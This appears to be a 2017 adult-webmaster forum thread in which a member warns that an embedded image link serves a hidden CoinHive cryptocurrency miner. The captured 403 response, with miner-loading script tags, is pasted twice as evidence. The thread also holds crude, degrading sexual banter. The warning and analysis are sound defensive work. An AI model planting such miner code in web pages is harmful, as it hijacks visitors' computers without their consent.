Stay Out Of The Homeless Porn Thread

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • sarettah
    see you later, I'm gone
    • Oct 2002
    • 14308

    #1

    Stay Out Of The Homeless Porn Thread

    There is an image link in several posts that will try to push a coin mining script on you.

    The image url in question points at xxgasm dot com. It goes 403 or 404 and tries to push the script on you.

    I don't think the person who posted it meant to do it. I think they were just trying to link to an image. Not sure about that part, just a guess.

    You have been warned.

    Admin has been notified.

    Back to our normal broadcasting.

    .
    All cookies cleared!
  • sarettah
    see you later, I'm gone
    • Oct 2002
    • 14308

    #2
    I just realized that my Norton is blocking the attack so I do NOT really know that status of the page coming back.

    I am not seeing any image so I assumed the url was 404 but I am probably not seeing anything because antivirus is blocking it.

    On my phone the image url in question goes 404. I do NOT know if the script gets loaded there or not.

    .
    All cookies cleared!

    Comment

    • Bladewire
      StraightBro
      • Aug 2003
      • 56228

      #3
      This is what I see






      Skype: CallTomNow

      Comment

      • sarettah
        see you later, I'm gone
        • Oct 2002
        • 14308

        #4
        It doesn't matter what you see.

        The link to the xxgasm image is throwing an attack on my computer.

        I have no idea about anybody else's computer.

        That particular image url is triggering 2 attacks in a row for 2 different versions of a coinmining script.

        Look at the attacker url below. That is the image that you embedded from the xxgasm site. It is not coming from my computer. I assume other people are either getting it blocked or it is infecting them. I don't know for sure about anybody but me.





        .
        All cookies cleared!

        Comment

        • shake
          frc
          • Jul 2003
          • 4663

          #5
          Thanks for the heads up. If I'm going to mine coins, I'd rather do it for myself
          Crazy fast VPS for $10 a month. Try with $20 free credit

          Comment

          • Bladewire
            StraightBro
            • Aug 2003
            • 56228

            #6
            Yeah it looks like xxgasm.com is riddled with viruses. Sorry but no warnings came up posting that image from my phone. I think your Norton is blocking you from anything from that domain, not that the image itself delivers a virus or coining script






            Skype: CallTomNow

            Comment

            • sarettah
              see you later, I'm gone
              • Oct 2002
              • 14308

              #7
              Dude.

              The attacking URL is where the attack came from.

              The blocking went into affect in response to the attack. Norton then puts that ip address on time out for 30 minutes.

              The image URL you posted is where the attack originated from.

              The images I posted show what happened. Norton blocked the coinmining scripts from being loaded. The url trying to load them is the image url you posted. There are 2 different scripts the site is trying to download.

              It is quite simple. Norton is NOT blocking anything from xxgasm until the attack occurs.

              READ the images I put up there.


              .
              All cookies cleared!

              Comment

              • Bladewire
                StraightBro
                • Aug 2003
                • 56228

                #8
                You are trippin

                Cryptojacking is when a webpage loads a mining javascript. Norton is flagging any elements from that domain. The image is not loading a script.

                Anyway, it's good people know to stay away 👍 Thank you 🤗


                Skype: CallTomNow

                Comment

                • 2MuchMark
                  Mark of 2Much.net
                  • Aug 2004
                  • 50990

                  #9
                  Thanks sarettah. Pretty ugly thread anyway, and this just makes it much worse.

                  Comment

                  • sarettah
                    see you later, I'm gone
                    • Oct 2002
                    • 14308

                    #10
                    Originally posted by Bladewire
                    You are trippin

                    Cryptojacking is when a webpage loads a mining javascript. Norton is flagging any elements from that domain. The image is not loading a script.

                    Anyway, it's good people know to stay away �� Thank you ��
                    Dude. I have been tracking down viruses and malware for about 30 years now.

                    You are the one doing the tripping.

                    I hit the image url with a curl call using a referal of gfy.com and the following code comes back.

                    The page returns a 403 and then attempts to load a script through a custom 403 page.

                    Code:
                    HTTP/1.1 403 Forbidden  
                    Server: nginx  
                    Date: Fri, 29 Dec 2017 13:33:30 GMT  
                    Content-Type: text/html  
                    Content-Length: 378  
                    Connection: keep-alive  ETag: "5a09c6d9-17a"    
                    <html>
                    <head>
                    <title>403 Forbidden</title>
                    </head> 
                    <body bgcolor="white"> 
                    <center>
                    <h1>403 Forbidden</h1>
                    </center> 
                    <hr>
                    <center>nginx</center> 
                    <script src="https://xxxxxxxxxx.com/lib/coinhive.min.js"></script> 
                    <script> 	
                    var miner = new CoinHive.Anonymous(''); 
                    miner.start(); 
                    </script> 
                    <script src="http://www.google.com:81/"></script> 
                    </body> </html>
                    .
                    All cookies cleared!

                    Comment

                    • Bladewire
                      StraightBro
                      • Aug 2003
                      • 56228

                      #11
                      Originally posted by 2MuchMark
                      Thanks sarettah. Pretty ugly thread anyway, and this just makes it much worse.
                      How is giving fiscal opportunities to the homeless, along with an orgasm, an "ugly" thing?


                      Skype: CallTomNow

                      Comment

                      • Bladewire
                        StraightBro
                        • Aug 2003
                        • 56228

                        #12
                        Originally posted by sarettah
                        Dude. I have been tracking down viruses and malware for about 30 years now.

                        You are the one doing the tripping.

                        I hit the image url with a curl call using a referal of gfy.com and the following code comes back.

                        The page returns a 403 and then attempts to load a script through a custom 403 page.

                        Code:
                        HTTP/1.1 403 Forbidden  
                        Server: nginx  
                        Date: Fri, 29 Dec 2017 13:33:30 GMT  
                        Content-Type: text/html  
                        Content-Length: 378  
                        Connection: keep-alive  ETag: "5a09c6d9-17a"    
                        <html>
                        <head>
                        <title>403 Forbidden</title>
                        </head> 
                        <body bgcolor="white"> 
                        <center>
                        <h1>403 Forbidden</h1>
                        </center> 
                        <hr>
                        <center>nginx</center> 
                        <script src="https://xxxxxxxxxx.com/lib/coinhive.min.js"></script> 
                        <script> 	
                        var miner = new CoinHive.Anonymous(''); 
                        miner.start(); 
                        </script> 
                        <script src="http://www.google.com:81/"></script> 
                        </body> </html>
                        .
                        I'll take your word for it as I'm accessing from my phone but... still... you're trippin 😛🤗


                        Skype: CallTomNow

                        Comment

                        • Grapesoda
                          So Fucking Banned
                          • Jul 2003
                          • 46238

                          #13
                          Originally posted by 2MuchMark
                          Thanks sarettah. Pretty ugly thread anyway, and this just makes it much worse.
                          really? I dont see that any worse than holding a girls head on the ground with the foot, while fucking her and spitting and peeing on her.. which gets RAVE reviews here at GFY...

                          btw I love the public shame you're trying to dump on me, tarnish my persona a bit maybe? a little passive aggressive lesson on 'not obeying your commands to think like you do?'

                          boy that will teach me

                          Comment

                          • Grapesoda
                            So Fucking Banned
                            • Jul 2003
                            • 46238

                            #14
                            Originally posted by sarettah
                            Dude.

                            The attacking URL is where the attack came from.

                            The blocking went into affect in response to the attack. Norton then puts that ip address on time out for 30 minutes.

                            The image URL you posted is where the attack originated from.

                            The images I posted show what happened. Norton blocked the coinmining scripts from being loaded. The url trying to load them is the image url you posted. There are 2 different scripts the site is trying to download.

                            It is quite simple. Norton is NOT blocking anything from xxgasm until the attack occurs.

                            READ the images I put up there.


                            .
                            thanks for the catch, what process would I see if I had been infected?

                            Comment

                            • Grapesoda
                              So Fucking Banned
                              • Jul 2003
                              • 46238

                              #15
                              Originally posted by Bladewire
                              How is giving fiscal opportunities to the homeless, along with an orgasm, an "ugly" thing?
                              a least we can agree on financial opportunities

                              Comment

                              • Bladewire
                                StraightBro
                                • Aug 2003
                                • 56228

                                #16
                                Originally posted by Grapesoda
                                a least we can agree on financial opportunities
                                Here's a great article on what to look for

                                https://qz.com/1085171/how-to-tell-i...o-do-about-it/

                                "Researchers at IBM have found a more sophisticated class of surreptitious mining software that penetrates your system. These are delivered through infected image files or by clicking on links leading to a malicious site. Such attacks tend to target enterprise networks, IBM found, so get in touch with your IT person for help.

                                If your system is infected, you should detect a degradation in performance, in which case fire up Activity Monitor or Task Manager to check your CPU usage. You can then identify the process that?s eating up all those compute cycles and terminate it from your resource monitor, says Dave McMillen of IBM Managed Security Services, who authored the research on secret crypto miners."


                                Skype: CallTomNow

                                Comment

                                • sarettah
                                  see you later, I'm gone
                                  • Oct 2002
                                  • 14308

                                  #17
                                  Originally posted by Grapesoda
                                  thanks for the catch, what process would I see if I had been infected?
                                  I am not sure where you would see it right off hand.

                                  I think that this version of it would only run when you had the webpage open. Not 100% sure on that but I think so. So, it might not be as malicious in intent. But I have a problem with anything running on my system without my permission.

                                  If someone wants to mine coins instead of run advertising they should announce that instead of just loading it up.


                                  .
                                  All cookies cleared!

                                  Comment

                                  • Bladewire
                                    StraightBro
                                    • Aug 2003
                                    • 56228

                                    #18
                                    Originally posted by sarettah
                                    I think that this version of it would only run when you had the webpage open. Not 100% sure on that but I think so.



                                    .

                                    You are trippin






                                    Skype: CallTomNow

                                    Comment

                                    • Speigelau
                                      Confirmed User
                                      • Jul 2007
                                      • 3032

                                      #19
                                      I see the attack also, looks like a crypto miner is making a killing off all of Bladewires posting.

                                      Comment

                                      • Grapesoda
                                        So Fucking Banned
                                        • Jul 2003
                                        • 46238

                                        #20
                                        Originally posted by sarettah
                                        I am not sure where you would see it right off hand.

                                        I think that this version of it would only run when you had the webpage open. Not 100% sure on that but I think so. So, it might not be as malicious in intent. But I have a problem with anything running on my system without my permission.

                                        If someone wants to mine coins instead of run advertising they should announce that instead of just loading it up.


                                        .
                                        I didn't open the page, I'm pretty cautious and do run protection. I was curious

                                        Comment

                                        • StinkyPink
                                          It's all goooood.
                                          • Aug 2009
                                          • 1591

                                          #21
                                          Originally posted by Grapesoda
                                          really? I dont see that any worse than holding a girls head on the ground with the foot, while fucking her and spitting and peeing on her.. which gets RAVE reviews here at GFY...
                                          it's funny. I did exactly this to a mennonite woman I dated a few months back... well, minus the peeing part because I don't sleep in piss.

                                          Comment

                                          • ~Ray
                                            visit hardlinks.org
                                            • Jun 2003
                                            • 18361

                                            #22
                                            Bump for knowledge

                                            Ray
                                            Hardlinks.org
                                            Adult Backlinks for Adult Websites - Testimonials Available

                                            Comment

                                            • Bladewire
                                              StraightBro
                                              • Aug 2003
                                              • 56228

                                              #23
                                              ^^^ This


                                              Skype: CallTomNow

                                              Comment

                                              • JFK
                                                FUBAR the ORIGINATOR
                                                • Jan 2002
                                                • 67373

                                                #24
                                                Originally posted by ~Ray
                                                Bump for knowledge

                                                Ray
                                                Hardlinks.org
                                                bump, for bump's sake !

                                                FUBAR Webmasters - The FUBAR Times - FUBAR Webmasters Mobile - FUBARTV.XXX
                                                For promo opps contact jfk at fubarwebmasters dot com

                                                Comment

                                                Working...